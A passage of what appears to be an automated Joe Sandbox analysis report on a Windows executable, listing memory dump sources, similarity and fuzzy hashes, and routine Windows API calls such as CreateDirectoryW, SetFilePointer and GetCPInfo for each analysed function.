                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileWrite$Handle
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4209713984-0
                                                                                                                                            • Opcode ID: a970b05bbadaef60ae85348f850f653ba86195160c7e1160da1fe296ddd01ded
                                                                                                                                            • Instruction ID: d13319070a8d223de13c2140b4c5498162f312b616dddbf0dc907c08e86602db
                                                                                                                                            • Opcode Fuzzy Hash: a970b05bbadaef60ae85348f850f653ba86195160c7e1160da1fe296ddd01ded
                                                                                                                                            • Instruction Fuzzy Hash: CB412B27A0CA5293EB24CF24E9147B92364FF44B98F044431EB4D8BA98CF3EE556D705
                                                                                                                                            APIs
                                                                                                                                            • CreateDirectoryW.KERNELBASE(00000001,00000001,?,00007FF6EF6BD343,00000001,?,?,00007FF6EF6B91EB), ref: 00007FF6EF6BD734
                                                                                                                                            • CreateDirectoryW.KERNEL32(00000001,00000001,?,00007FF6EF6BD343,00000001,?,?,00007FF6EF6B91EB), ref: 00007FF6EF6BD769
                                                                                                                                            • GetLastError.KERNEL32(00000001,00000001,?,00007FF6EF6BD343,00000001,?,?,00007FF6EF6B91EB), ref: 00007FF6EF6BD786
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateDirectory$ErrorLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2485089472-0
                                                                                                                                            • Opcode ID: c509ee56912e0ed8a096a77351797c46b0935274de5d5c8b26b24dc22b5557b9
                                                                                                                                            • Instruction ID: cf7c8785d8ccf1530e056101d7823a1d1dc0aec73bad9232b18be3c736912f96
                                                                                                                                            • Opcode Fuzzy Hash: c509ee56912e0ed8a096a77351797c46b0935274de5d5c8b26b24dc22b5557b9
                                                                                                                                            • Instruction Fuzzy Hash: 5221F623A1C64243FB70AF2595413FD2359AF857D4F040831F94DCA2D9DF6FE585A60A
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Message$LoadStringText$DialogDispatchItemPeekTranslateWindowswprintf
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1010759681-0
                                                                                                                                            • Opcode ID: 5fc12fbf829ac9eb82e241ccbda5c806d037b597829fcb6a2fe34066050df77d
                                                                                                                                            • Instruction ID: cfdad764cce059ecd677d79bb48685ac1c7712789f94fb29fe9fe26b9c04da3e
                                                                                                                                            • Opcode Fuzzy Hash: 5fc12fbf829ac9eb82e241ccbda5c806d037b597829fcb6a2fe34066050df77d
                                                                                                                                            • Instruction Fuzzy Hash: 1CF0C257A1C68247FA106B60E8113E92394BF88384F800031F98D873A2DE2FE2518B0A
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                            • Opcode ID: d7b4fcf76b33b70473447b9cedc717a565b400a7f64c403ea979d858785ee2ed
                                                                                                                                            • Instruction ID: 9d3360a9c5b2f5441296ec3632ca2a9a77e4902af71754e1cdacc04d53b0e465
                                                                                                                                            • Opcode Fuzzy Hash: d7b4fcf76b33b70473447b9cedc717a565b400a7f64c403ea979d858785ee2ed
                                                                                                                                            • Instruction Fuzzy Hash: 2CE01A27B04305D7EE14AB619D81779235A9FC8B41F004138C80E873A2CE3FA64DA307
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Info
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1807457897-3916222277
                                                                                                                                            • Opcode ID: bac15ddce867e0a1e863a11a7079234ebc720208b27a2c3926ac389e887c3f34
                                                                                                                                            • Instruction ID: 1f5bc68917c31b30e3e22587918a70ff755a26aa68772043f84fc3110635c02a
                                                                                                                                            • Opcode Fuzzy Hash: bac15ddce867e0a1e863a11a7079234ebc720208b27a2c3926ac389e887c3f34
                                                                                                                                            • Instruction Fuzzy Hash: AF518C77A1C2C18BE7218F38D4443AE7BA4F748748F544136E68D87A86CF7AD246DB05
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: String
                                                                                                                                            • String ID: LCMapStringEx
                                                                                                                                            • API String ID: 2568140703-3893581201
                                                                                                                                            • Opcode ID: 1e17f4cee329f729a4cd225e223d4fe21f5d41a04b2378488f210279b6c12dbb
                                                                                                                                            • Instruction ID: 51126d9a7c1bfae06d9e74ebe933d79e6e3f1e8435221c51a79f1d4b37613120
                                                                                                                                            • Opcode Fuzzy Hash: 1e17f4cee329f729a4cd225e223d4fe21f5d41a04b2378488f210279b6c12dbb
                                                                                                                                            • Instruction Fuzzy Hash: B7212A37A08B8583DA60CB56F84026AB7A4FBC8BC4F144136DE8D83B68DE3DD545DB04
                                                                                                                                            APIs
                                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00000003,00007FF6EF6E2E01), ref: 00007FF6EF6E3C31
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                            • String ID: InitializeCriticalSectionEx
                                                                                                                                            • API String ID: 2593887523-3084827643
                                                                                                                                            • Opcode ID: 2c429491ec8747b6a626657169381bb8c0026c5a015cd3a8bc3a0a1640857e88
                                                                                                                                            • Instruction ID: c4d1f77f5eff503d2904b5a9514977a85570c1a2ccbeeb00d053ea8876cce993
                                                                                                                                            • Opcode Fuzzy Hash: 2c429491ec8747b6a626657169381bb8c0026c5a015cd3a8bc3a0a1640857e88
                                                                                                                                            • Instruction Fuzzy Hash: 36F08127B08B85C3EB049F42B4401797765AB89BC0F945035EA4D47B14DE3EE545D705
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Alloc
                                                                                                                                            • String ID: FlsAlloc
                                                                                                                                            • API String ID: 2773662609-671089009
                                                                                                                                            • Opcode ID: 5a1af9dab99bba9a6cb0066968623d5ceb271645f962abe96446c83537b1644d
                                                                                                                                            • Instruction ID: d0bd673be8b353799e2002036024994c8a63a7d3663c62db0863324a95e22bf1
                                                                                                                                            • Opcode Fuzzy Hash: 5a1af9dab99bba9a6cb0066968623d5ceb271645f962abe96446c83537b1644d
                                                                                                                                            • Instruction Fuzzy Hash: CDE03013B08746D3EE459B56F9512B817689F467C4F941031D91D47360EE2EE689D30A
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00007FF6EF6E472C: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,00007FF6EF6E4A49,?,?,?,?,?,?,?,00007FF6EF6E4BF9), ref: 00007FF6EF6E4756
                                                                                                                                            • IsValidCodePage.KERNEL32(?,?,?,00000000,?,00000000,00000001,00007FF6EF6E4AFC,?,?,?,?,?,?,?,00007FF6EF6E4BF9), ref: 00007FF6EF6E4D42
                                                                                                                                            • GetCPInfo.KERNEL32(?,?,?,00000000,?,00000000,00000001,00007FF6EF6E4AFC,?,?,?,?,?,?,?,00007FF6EF6E4BF9), ref: 00007FF6EF6E4D57
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CodeInfoPageValid
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 546120528-0
                                                                                                                                            • Opcode ID: 1553bcfc5aca4ca800b5f203275528867a3a5bf56541edb4c2be03593f351a34
                                                                                                                                            • Instruction ID: 0d4410700b86e82de3f79b6bf90fa89925c1695dcbe3abf6828a38c6371dd887
                                                                                                                                            • Opcode Fuzzy Hash: 1553bcfc5aca4ca800b5f203275528867a3a5bf56541edb4c2be03593f351a34
                                                                                                                                            • Instruction Fuzzy Hash: C081C167E0C69287E7648F35984037877A9EB40B80F598131DA8DC7694DE3FEA41E34A
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::bad_alloc::bad_alloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1875163511-0
                                                                                                                                            • Opcode ID: 618c69e4fb568312681faad741d6b8e769d3b256376b7328c2c0ecb3efb9c953
                                                                                                                                            • Instruction ID: 87b008349ce6bdef191d8cc0c944dac67220499063de720c107b8c2739c49ba8
                                                                                                                                            • Opcode Fuzzy Hash: 618c69e4fb568312681faad741d6b8e769d3b256376b7328c2c0ecb3efb9c953
                                                                                                                                            • Instruction Fuzzy Hash: 8F419E63A08A8247EF60EF31D1403B97768AF54B84F494531DB8D8B799DF3EE641930A
                                                                                                                                            APIs
                                                                                                                                            • SetFilePointer.KERNELBASE(?,00000001,?,?,?,00007FF6EF6BCB69), ref: 00007FF6EF6BCCC6
                                                                                                                                            • GetLastError.KERNEL32(?,00000001,?,?,?,00007FF6EF6BCB69), ref: 00007FF6EF6BCCD5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2976181284-0
                                                                                                                                            • Opcode ID: fd696965cc74116d374b50372c7714ac3cfe2692967d93b440dc49aca272c4b1
                                                                                                                                            • Instruction ID: a6c9b1b35191896213d27b7010b78746c61fb3f8ced9915013cdc763bba587d7
                                                                                                                                            • Opcode Fuzzy Hash: fd696965cc74116d374b50372c7714ac3cfe2692967d93b440dc49aca272c4b1
                                                                                                                                            • Instruction Fuzzy Hash: 12313823B1964283EA604F29D9447781368AF54BD4F140931FE1CC7798DF2FE641A706
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 73155330-0
                                                                                                                                            • Opcode ID: ec79624c46bc47e7d42d1b2591c92fcff0b3d36e474fb898bdabfb43df807e29
                                                                                                                                            • Instruction ID: 9f7bb15bcf603bc77ca55c321052e4605fbb9cca5ebca443996a26248be4d540
                                                                                                                                            • Opcode Fuzzy Hash: ec79624c46bc47e7d42d1b2591c92fcff0b3d36e474fb898bdabfb43df807e29
                                                                                                                                            • Instruction Fuzzy Hash: D631A533A09B8243EA19AB11E54036963E9EF447E0F544B34E7BE47BDDEE2DE0909305
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                            • Opcode ID: d1154827a2bd690f80419550eff16fed19451c218b2921c8879e33f9bf465373
                                                                                                                                            • Instruction ID: 810d768b607f307a918cc3c2ca207b9345192019a3c6a05a2d3c6a510271a7e5
                                                                                                                                            • Opcode Fuzzy Hash: d1154827a2bd690f80419550eff16fed19451c218b2921c8879e33f9bf465373
                                                                                                                                            • Instruction Fuzzy Hash: 6C313573A1864147EB708F20E4047A93754BB457B8F005331EEAC876C9EF7ED545AB4A
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$BuffersFlushTime
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1392018926-0
                                                                                                                                            • Opcode ID: e97e05df5904ee765d6b699a289decc8c7c4cd8133a24b8a836e434f42861f76
                                                                                                                                            • Instruction ID: 32f527f7837be8253d21dc6a99d1a6c5a60d0ea843633f3a62245b5ec255388b
                                                                                                                                            • Opcode Fuzzy Hash: e97e05df5904ee765d6b699a289decc8c7c4cd8133a24b8a836e434f42861f76
                                                                                                                                            • Instruction Fuzzy Hash: 86214423E0D74253EE218B11D400376579CAF45796F444571EE4C47299EF3EEA86E20A
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2976181284-0
                                                                                                                                            • Opcode ID: 31bdbebb0b85d60902ef083526541ee72a562a1f20adb25ae37104f4e5c60490
                                                                                                                                            • Instruction ID: 5f356795ffc94ae6282f520bc216793f442c8e3523fbcfa5c9f268403546877a
                                                                                                                                            • Opcode Fuzzy Hash: 31bdbebb0b85d60902ef083526541ee72a562a1f20adb25ae37104f4e5c60490
                                                                                                                                            • Instruction Fuzzy Hash: 1A116D23A0864183EB648F25A4403A82364EB84B68F544731EA3D972D8DF3ED597D30A
                                                                                                                                            APIs
